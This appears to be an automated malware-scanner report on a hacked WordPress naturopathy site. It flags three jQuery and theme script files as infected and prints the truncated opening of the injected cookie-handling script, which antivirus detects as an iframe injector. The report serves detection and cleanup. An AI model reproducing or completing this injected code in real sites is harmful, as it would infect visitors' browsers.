New scan:

Malware Scanner report for mon-naturopathe.com

Malicious/Suspicious/Total urls checked
3/0/16
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "mon-naturopathe.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/10
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mon-naturopathe.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.mon-naturopathe.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 21 Sep 2014 06:47:24 GMT
Location: http://mon-naturopathe.com/
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://mon-naturopathe.com/xmlrpc.php
X-Powered-By: PHP/5.3.2-1ubuntu4.26.1~gandi
clean
http://mon-naturopathe.com/
200 OK
Content-Length: 26679
Content-Type: text/html
clean
http://mon-naturopathe.com/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 96697
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Art_protection() {
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function takeOrlondo(name) {
var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return nachos ? decodeURIComponent(nachos[1]) : undefined;
}
var cookie = takeOrlondo(
... 3179 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?m.css(b,c,g):m.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),m.fn.size=function(){return this.length},m.fn.andSelf=m.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return m});var ed=a.jQuery,fd=a.$;return m.noConflict=function(b){return a.$===m&&(a.$=fd),b&&a.jQuery===m&&(a.jQuery=ed),m},typeof b===K&&(a.jQuery=a.$=m),m});
jQuery.noConflict();

Antivirus reports:

Avast
HTML:Iframe-inf

http://mon-naturopathe.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8090
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Art_protection() {
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function takeOrlondo(name) {
var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return nachos ? decodeURIComponent(nachos[1]) : undefined;
}
var cookie = takeOrlondo(
... 3281 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Avast
HTML:Iframe-inf

http://mon-naturopathe.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105
200 OK
Content-Length: 13003
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-includes/js/comment-reply.min.js?ver=4.0
200 OK
Content-Length: 1647
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20
200 OK
Content-Length: 15248
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3
200 OK
Content-Length: 9658
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4
200 OK
Content-Length: 7411
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-fr.js?ver=2.6.9
200 OK
Content-Length: 7847
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.9
200 OK
Content-Length: 71745
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.9
200 OK
Content-Length: 4061
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/themes/emerald/js/respond.js?ver=1.0.1
200 OK
Content-Length: 4106
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/themes/emerald/js/jquery.tweet.js
200 OK
Content-Length: 14808
Content-Type: application/javascript
clean
http://mon-naturopathe.com/wp-content/themes/emerald/js/superfish.js?ver=1.4.8
200 OK
Content-Length: 4723
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Art_protection() {
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function takeOrlondo(name) {
var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return nachos ? decodeURIComponent(nachos[1]) : undefined;
}
var cookie = takeOrlondo(
... 3799 bytes are skipped ...
y','hidden');
o.onHide.call($ul);
return this;
},
showSuperfishUl : function(){
var o = sf.op,
sh = sf.c.shadowClass+'-off',
$ul = this.addClass(o.hoverClass)
.find('>ul:hidden').css('visibility','visible');
sf.IE7fix.call($ul);
o.onBeforeShow.call($ul);
$ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); });
return this;
}
});

})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf

http://mon-naturopathe.com/wp-content/themes/emerald/js/tooltipsy.js
200 OK
Content-Length: 6725
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mon-naturopathe.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Sun, 21 Sep 2014 06:47:24 GMT
Accept-Ranges: bytes
ETag: "8a0ed-6837-5036fd3219580"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,Cookie
Content-Length: 26679
Content-Type: text/html; charset=UTF-8
Expires: Sun, 21 Sep 2014 06:47:27 GMT
Last-Modified: Fri, 19 Sep 2014 19:08:22 GMT

...26679 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mon-naturopathe.com
Referer: http://www.google.com/search?q=mon-naturopathe.com

Result:
The result is similar to the first query. There are no suspicious redirects found.